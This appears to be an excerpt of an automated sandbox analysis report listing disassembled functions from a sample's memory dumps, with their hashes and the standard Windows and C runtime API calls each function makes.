                                                                                                                                                                                                                                              • Instruction ID: 89950e66e1e7595f73e5d2471849ea4cf1da5f15be1750b1ef41ca9c0f1f1258
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01820b5e91838856b581c91fb14ebaa471e61facb4963126e32138b1e2bee703
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2051D472920226BFEF204FE0EC45FAA7BA9EF44780F114425F911AA150D7B4DE219B54
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strrchr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3213747228-0
                                                                                                                                                                                                                                              • Opcode ID: 90a798cb3167070a9428d5a8ad016659465e7669ef58dc39ee64ab71c5640075
                                                                                                                                                                                                                                              • Instruction ID: 3190abb938c0f5b758e989a418c3d18af350b9def9a9eeebebc4a859e9c5212b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90a798cb3167070a9428d5a8ad016659465e7669ef58dc39ee64ab71c5640075
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42B17AB2E243569FDB15CF28DC82BEEBBA5EF15310F144155E944AB282D370A921CBA0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 0022EE37
                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0022EE3F
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 0022EEC8
                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0022EEF3
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 0022EF48
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                              • Opcode ID: 89f03f78e2e30223d25be7f7ee0a59fccb8b6b41c4a2d2c99024ba05c07f5ec8
                                                                                                                                                                                                                                              • Instruction ID: e72c0c2e193a5776cd15d3e4c6090d2940bbf3510cc04673f5e240b3499a8810
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89f03f78e2e30223d25be7f7ee0a59fccb8b6b41c4a2d2c99024ba05c07f5ec8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D41E934E20229ABCF10DFA8D845A9EBFB5AF45324F168065F8149B352D731DE21DF91
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0022DD3B
                                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(00000008,?,00000000,0024AD5D,000000FF,00000000,00229652,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0022DD5A
                                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(00000008,ios_base::badbit set,?,?,00000000,0024AD5D,000000FF,00000000,00229652,?,?,?,?,?,?,00000000), ref: 0022DD88
                                                                                                                                                                                                                                              • TryAcquireSRWLockExclusive.KERNEL32(00000008,ios_base::badbit set,?,?,00000000,0024AD5D,000000FF,00000000,00229652,?,?,?,?,?,?,00000000), ref: 0022DDE3
                                                                                                                                                                                                                                              • TryAcquireSRWLockExclusive.KERNEL32(00000008,ios_base::badbit set,?,?,00000000,0024AD5D,000000FF,00000000,00229652,?,?,?,?,?,?,00000000), ref: 0022DDFA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                              • String ID: ios_base::badbit set
                                                                                                                                                                                                                                              • API String ID: 66001078-3882152299
                                                                                                                                                                                                                                              • Opcode ID: 43d331d543988356f94246db4bfbc96f5fa9c95c90ebc538f2dc6365ba91c71d
                                                                                                                                                                                                                                              • Instruction ID: 983be9aeb6471bf1d9725b9ad3277ba66d42b1dc639005d003c8da89954ad2d2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43d331d543988356f94246db4bfbc96f5fa9c95c90ebc538f2dc6365ba91c71d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF417D32920A27EFCB20DFA4E5849BAB3F4FF18311B514919D456DB540D770FA61CB50
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0022E142
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0022E150
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 0022E161
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                              • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                              • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                              • Opcode ID: 675fddd07030a209898f6e8aaf1c0342a05fe1b508bcf771858d80cbbb64ce1a
                                                                                                                                                                                                                                              • Instruction ID: 95cfd17ce84810cf8125ed2f46aba00e71eacd0c7115338ceed3e167d0c9d5f0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 675fddd07030a209898f6e8aaf1c0342a05fe1b508bcf771858d80cbbb64ce1a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8BD0A731972310DB8340DF707D0D95A3AB4EB0E3833004011FC00D2190F7B445288A9C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 72c9670ab92ba3af34a01772574ec75c6d0f800f6c2b982f17fd61681a8b1a13
                                                                                                                                                                                                                                              • Instruction ID: eb2d29dc1cd2cb80ee4d629547f0a49aaff5bd7d7b4a4177999575b335622faa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72c9670ab92ba3af34a01772574ec75c6d0f800f6c2b982f17fd61681a8b1a13
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91B145B0A24345AFDB19DF98D885BAEBBF5FF05314F144159E800AB282D7B09E61CF64
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 0022589C
                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00225A5B
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::cancel_current_task_strlen
                                                                                                                                                                                                                                              • String ID: ,$false$true
                                                                                                                                                                                                                                              • API String ID: 575380510-760133229
                                                                                                                                                                                                                                              • Opcode ID: 5492def7ae3fb3e8ad94d40ab5ec8a4b0bde24a80184291e35e911355b4f2091
                                                                                                                                                                                                                                              • Instruction ID: 67b658acc71b4a85aae56f8d020933a757bd890d7a35c446cffcfc82e970dc4c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5492def7ae3fb3e8ad94d40ab5ec8a4b0bde24a80184291e35e911355b4f2091
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8DC1A7B1514715AFD3109FA4DC85B6BB7E8EF94304F04892CF9858B242F775D928CB92
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,0023965B,0022EBD7,0022D9C8), ref: 00239672
                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00239680
                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00239699
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,0023965B,0022EBD7,0022D9C8), ref: 002396EB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                              • Opcode ID: 7e3aa69a48ea7580f805edc5c085c1ea1fb65538c115aaba29b1f28e1ae417a2
                                                                                                                                                                                                                                              • Instruction ID: 9a0479cf4c5f62f92e00046787275586a3c2dc301a64900aa588e2e6412fafc5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e3aa69a48ea7580f805edc5c085c1ea1fb65538c115aaba29b1f28e1ae417a2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A201F9B213A7226FA6152EB4BC4F95B275CEB027B6B204229F011550F1EFE18CB09944
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 0023A04B
                                                                                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 0023A2C4
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                              • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                              • Opcode ID: 222040da1c112a1269915584bd64d02069275886150cfc8e2168ea4ceafa42b6
                                                                                                                                                                                                                                              • Instruction ID: d0d65f99e3fefa3da1181a308976644bf067331bfb20f6936c404196e748fdf2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 222040da1c112a1269915584bd64d02069275886150cfc8e2168ea4ceafa42b6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43B1AFB182020AEFCF18DFA5D8819AEB7B5FF15300F104169E8956B212D772DA71CF92
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00223BFC
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00223C1A
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00223C3C
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00223CAA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID: ios_base::badbit set
                                                                                                                                                                                                                                              • API String ID: 593203224-3882152299
                                                                                                                                                                                                                                              • Opcode ID: 2cf9db49dbd7a24e177ce94a6dd913ca38a9e8e9c889685b5099247b8713b406
                                                                                                                                                                                                                                              • Instruction ID: 0134cb67cb307559ac5be8478ef50d2fd136517f82f1861752df98cf6659dc1f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2cf9db49dbd7a24e177ce94a6dd913ca38a9e8e9c889685b5099247b8713b406
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A21BF71918324AFC710EF94F849A2AB7A0FF48725F05455EE8885B3A1D734AE60CF82
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 0022A5AD
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0022A5BA
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0022A624
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0022A63E
                                                                                                                                                                                                                                                • Part of subcall function 00229CA8: _Yarn.LIBCPMT ref: 00229CC8
                                                                                                                                                                                                                                                • Part of subcall function 00229CA8: _Yarn.LIBCPMT ref: 00229CEC
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Yarn$H_prolog3Lockit::~_
                                                                                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                                                                                              • API String ID: 3084819986-1405518554
                                                                                                                                                                                                                                              • Opcode ID: 9516cc92970077acfa37d27b4936916a134d917c26c7667d78d0d51efe35a421
                                                                                                                                                                                                                                              • Instruction ID: 46bf87dcb83704056d16462f5728c5e456043b6190223753f2988ff032d05c4b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9516cc92970077acfa37d27b4936916a134d917c26c7667d78d0d51efe35a421
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF119371825754EFC720DFA9F481686BBE4FF28310F50496EE08A83641D770AA94CF9A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,439473B7,?,?,00000000,0024AD7A,000000FF,?,002341AA,00000002,?,00234246,00236EA9), ref: 0023411E
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00234130
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,0024AD7A,000000FF,?,002341AA,00000002,?,00234246,00236EA9), ref: 00234152
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                              • Opcode ID: f5e0ba138416c4077aed1e46c365a655d2ddfdd23ba81a92f8bd2f28aa878953
                                                                                                                                                                                                                                              • Instruction ID: 94c8e16026386b0af18a687ec4842f07c54bb3f819f2711b7812489d1063711f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5e0ba138416c4077aed1e46c365a655d2ddfdd23ba81a92f8bd2f28aa878953
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33012B31A60719EFDB019F50DC0DFAEB7B8FB04B52F004125F811A26E0DB74A910CA84
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0023C10B
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0023C1D4
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0023C23B
                                                                                                                                                                                                                                                • Part of subcall function 0023A8D1: RtlAllocateHeap.NTDLL(00000000,0023C8AA,?,?,0023C8AA,00000220,?,00000000,?), ref: 0023A903
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0023C24E
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0023C25B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1423051803-0
                                                                                                                                                                                                                                              • Opcode ID: 5c6cb866b618a0236af72406e79272f72f01d57cf83f1c19569fbd78ebb625c8
                                                                                                                                                                                                                                              • Instruction ID: 6afc38ec4f385b5b513006932c6fc6e834e9a16d5d2f527f7e78d48ef149e196
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c6cb866b618a0236af72406e79272f72f01d57cf83f1c19569fbd78ebb625c8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2851B5F262024AAFDF119EA4DC42DBB76A9EF84710F250129FD08E6101EB70DD309BA0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 0022B85E
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0022B868
                                                                                                                                                                                                                                              • int.LIBCPMT ref: 0022B87F
                                                                                                                                                                                                                                                • Part of subcall function 0022A613: std::_Lockit::_Lockit.LIBCPMT ref: 0022A624
                                                                                                                                                                                                                                                • Part of subcall function 0022A613: std::_Lockit::~_Lockit.LIBCPMT ref: 0022A63E
                                                                                                                                                                                                                                              • codecvt.LIBCPMT ref: 0022B8A2
